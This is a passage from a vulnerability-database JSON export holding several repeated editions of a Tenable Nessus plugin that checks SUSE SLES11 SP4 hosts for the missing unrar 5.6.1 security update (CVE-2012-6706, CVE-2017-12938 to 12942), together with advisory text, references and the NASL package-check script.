"SUSE_SU-2017-1763-1.NASL", "GENTOO_GLSA-201709-24.NASL", "GENTOO_GLSA-201710-21.NASL"]}, {"type": "cve", "idList": ["CVE-2017-12942", "CVE-2012-6706", "CVE-2017-12941", "CVE-2017-12938", "CVE-2017-12940"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-12941", "UB:CVE-2012-6706", "UB:CVE-2017-12940", "UB:CVE-2017-12938", "UB:CVE-2017-12942"]}, {"type": "suse", "idList": ["SUSE-SU-2017:1760-1", "SUSE-SU-2018:0809-1", "SUSE-SU-2017:1745-1", "SUSE-SU-2017:1716-1", "OPENSUSE-SU-2017:1797-1", "OPENSUSE-SU-2018:0825-1", "SUSE-SU-2018:0863-1"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:AE476E9F8D29EFD3EB8A7650FA8A0572"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310874188", "OPENVAS:1361412562310851575", "OPENVAS:1361412562310891003", "OPENVAS:1361412562310811258", "OPENVAS:1361412562310851727", "OPENVAS:1361412562310874227", "OPENVAS:1361412562310875200"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1003-1:FD9FD"]}, {"type": "exploitdb", "idList": ["EDB-ID:44402"]}, {"type": "fedora", "idList": ["FEDORA:F0C3560EA463", "FEDORA:682846030B04", "FEDORA:06420604AF9F"]}, {"type": "amazon", "idList": ["ALAS-2018-976"]}, {"type": "archlinux", "idList": ["ASA-201803-14"]}], "modified": "2021-08-11T13:53:28", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-08-11T13:53:28", "rev": 2}}, "objectVersion": "1.6", "pluginID": "108828", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0862-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108828);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6706\", \"CVE-2017-12938\", \"CVE-2017-12940\", \"CVE-2017-12941\", \"CVE-2017-12942\");\n\n script_name(english:\"SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for unrar to version 5.6.1 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a\n directory-traversal protection mechanism via vectors\n involving a symlink to the . directory, a symlink to the\n .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the\n EncodeFileName::Decode call within the\n Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the\n Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the\n Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=513804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=693890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6706/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12938/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12940/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12941/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12942/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180862-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?183f5d82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-unrar-13542=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-unrar-13542=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:unrar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"unrar-5.6.1-5.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"unrar\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:suse_linux:unrar", "cpe:/o:novell:suse_linux:11"], "solution": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch slessp4-unrar-13542=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch dbgsp4-unrar-13542=1", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2018-04-03T00:00:00", "vulnerabilityPublicationDate": "2017-06-22T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-11T13:53:28", "differentElements": ["nessusSeverity"], "edition": 7}, {"bulletin": {"id": "SUSE_SU-2018-0862-1.NASL", "hash": "9872c004d8eebef13fc67d6e52791962", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)", "description": "This update for unrar to version 5.6.1 fixes several issues. These security issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a directory-traversal protection mechanism via vectors involving a symlink to the . directory, a symlink to the .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the EncodeFileName::Decode call within the Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2018-04-04T00:00:00", "modified": "2021-01-19T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/108828", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2017-12940/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12940", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12941", "https://bugzilla.suse.com/show_bug.cgi?id=1054038", "https://www.suse.com/security/cve/CVE-2017-12938/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12942", "https://bugzilla.suse.com/show_bug.cgi?id=693890", "https://bugzilla.suse.com/show_bug.cgi?id=1046882", "http://www.nessus.org/u?183f5d82", "https://www.suse.com/security/cve/CVE-2017-12941/", "https://www.suse.com/security/cve/CVE-2012-6706/", "https://bugzilla.suse.com/show_bug.cgi?id=513804", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12938", "https://www.suse.com/security/cve/CVE-2017-12942/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6706"], "cvelist": ["CVE-2012-6706", "CVE-2017-12938", "CVE-2017-12940", "CVE-2017-12941", "CVE-2017-12942"], "immutableFields": [], "lastseen": "2021-08-19T12:32:51", "history": [], "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["GENTOO_GLSA-201708-05.NASL", "SUSE_SU-2017-1716-1.NASL", "SUSE_SU-2017-1763-1.NASL", "OPENSUSE-2017-779.NASL", "GENTOO_GLSA-201710-21.NASL", "SUSE_SU-2017-1760-1.NASL", "DEBIAN_DLA-1003.NASL", "SUSE_SU-2021-2834-1.NASL", "SUSE_SU-2017-1745-1.NASL", "GENTOO_GLSA-201709-24.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201709-24", "GLSA-201804-16", "GLSA-201708-05", "GLSA-201710-21"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-12941", "UB:CVE-2012-6706", "UB:CVE-2017-12942", "UB:CVE-2017-12938", "UB:CVE-2017-12940"]}, {"type": "cve", "idList": ["CVE-2017-12941", "CVE-2017-12942", "CVE-2017-12938", "CVE-2017-12940", "CVE-2012-6706"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811258", "OPENVAS:1361412562310874188", "OPENVAS:1361412562310851575", "OPENVAS:1361412562310875200", "OPENVAS:1361412562310891003", "OPENVAS:1361412562310851727", "OPENVAS:1361412562310874227"]}, {"type": "suse", "idList": ["SUSE-SU-2017:1745-1", "OPENSUSE-SU-2018:0825-1", "OPENSUSE-SU-2017:1797-1", "SUSE-SU-2017:1760-1", "SUSE-SU-2017:1716-1", "SUSE-SU-2018:0809-1", "SUSE-SU-2018:0863-1"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:AE476E9F8D29EFD3EB8A7650FA8A0572"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1003-1:FD9FD"]}, {"type": "exploitdb", "idList": ["EDB-ID:44402"]}, {"type": "fedora", "idList": ["FEDORA:682846030B04", "FEDORA:F0C3560EA463", "FEDORA:06420604AF9F"]}, {"type": "archlinux", "idList": ["ASA-201803-14"]}, {"type": "amazon", "idList": ["ALAS-2018-976"]}], "modified": "2021-08-19T12:32:51", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-08-19T12:32:51", "rev": 2}}, "objectVersion": "1.6", "pluginID": "108828", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0862-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108828);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6706\", \"CVE-2017-12938\", \"CVE-2017-12940\", \"CVE-2017-12941\", \"CVE-2017-12942\");\n\n script_name(english:\"SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for unrar to version 5.6.1 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a\n directory-traversal protection mechanism via vectors\n involving a symlink to the . directory, a symlink to the\n .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the\n EncodeFileName::Decode call within the\n Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the\n Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the\n Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=513804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=693890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6706/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12938/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12940/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12941/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12942/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180862-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?183f5d82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-unrar-13542=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-unrar-13542=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:unrar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"unrar-5.6.1-5.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"unrar\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:suse_linux:unrar", "cpe:/o:novell:suse_linux:11"], "solution": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch slessp4-unrar-13542=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch dbgsp4-unrar-13542=1", "nessusSeverity": "Critical", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2018-04-03T00:00:00", "vulnerabilityPublicationDate": "2017-06-22T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-19T12:32:51", "differentElements": ["vpr"], "edition": 8}, {"bulletin": {"id": "SUSE_SU-2018-0862-1.NASL", "hash": "9ec356b9ffe27e13053c2bf59f48808c", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)", "description": "This update for unrar to version 5.6.1 fixes several issues. These security issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a directory-traversal protection mechanism via vectors involving a symlink to the . directory, a symlink to the .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the EncodeFileName::Decode call within the Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2018-04-04T00:00:00", "modified": "2021-01-19T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/108828", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12938", "https://bugzilla.suse.com/show_bug.cgi?id=1054038", "https://bugzilla.suse.com/show_bug.cgi?id=693890", "https://www.suse.com/security/cve/CVE-2017-12938/", "http://www.nessus.org/u?183f5d82", "https://www.suse.com/security/cve/CVE-2017-12940/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12942", "https://www.suse.com/security/cve/CVE-2017-12942/", "https://bugzilla.suse.com/show_bug.cgi?id=1046882", "https://bugzilla.suse.com/show_bug.cgi?id=513804", "https://www.suse.com/security/cve/CVE-2017-12941/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6706", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12941", "https://www.suse.com/security/cve/CVE-2012-6706/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12940"], "cvelist": ["CVE-2012-6706", "CVE-2017-12938", "CVE-2017-12940", "CVE-2017-12941", "CVE-2017-12942"], "immutableFields": [], "lastseen": "2021-08-29T00:59:11", "history": [], "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SUSE_SU-2021-2834-1.NASL", "OPENSUSE-2017-724.NASL", "SUSE_SU-2017-1745-1.NASL", "SUSE_SU-2017-1760-1.NASL", "GENTOO_GLSA-201710-21.NASL", "OPENSUSE-2017-779.NASL", "SUSE_SU-2017-1716-1.NASL", "GENTOO_GLSA-201709-24.NASL", "GENTOO_GLSA-201708-05.NASL", "DEBIAN_DLA-1003.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201708-05", "GLSA-201709-24", "GLSA-201710-21", "GLSA-201804-16"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2012-6706", "UB:CVE-2017-12938", "UB:CVE-2017-12940", "UB:CVE-2017-12941", "UB:CVE-2017-12942"]}, {"type": "cve", "idList": ["CVE-2017-12942", "CVE-2017-12940", "CVE-2017-12941", "CVE-2017-12938", "CVE-2012-6706"]}, {"type": "suse", "idList": ["SUSE-SU-2018:0863-1", "SUSE-SU-2017:1745-1", "OPENSUSE-SU-2018:0825-1", "SUSE-SU-2017:1760-1", "OPENSUSE-SU-2017:1797-1", "SUSE-SU-2018:0809-1", "SUSE-SU-2017:1716-1"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:AE476E9F8D29EFD3EB8A7650FA8A0572"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310851575", "OPENVAS:1361412562310874227", "OPENVAS:1361412562310874188", "OPENVAS:1361412562310851727", "OPENVAS:1361412562310811258", "OPENVAS:1361412562310891003", "OPENVAS:1361412562310875200"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1003-1:FD9FD"]}, {"type": "exploitdb", "idList": ["EDB-ID:44402"]}, {"type": "fedora", "idList": ["FEDORA:06420604AF9F", "FEDORA:F0C3560EA463", "FEDORA:682846030B04"]}, {"type": "amazon", "idList": ["ALAS-2018-976"]}, {"type": "archlinux", "idList": ["ASA-201803-14"]}], "modified": "2021-08-29T00:59:11", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-08-29T00:59:11", "rev": 2}}, "objectVersion": "1.6", "pluginID": "108828", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0862-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108828);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6706\", \"CVE-2017-12938\", \"CVE-2017-12940\", \"CVE-2017-12941\", \"CVE-2017-12942\");\n\n script_name(english:\"SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for unrar to version 5.6.1 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a\n directory-traversal protection mechanism via vectors\n involving a symlink to the . directory, a symlink to the\n .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the\n EncodeFileName::Decode call within the\n Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the\n Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the\n Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=513804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=693890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6706/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12938/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12940/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12941/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12942/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180862-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?183f5d82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-unrar-13542=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-unrar-13542=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n 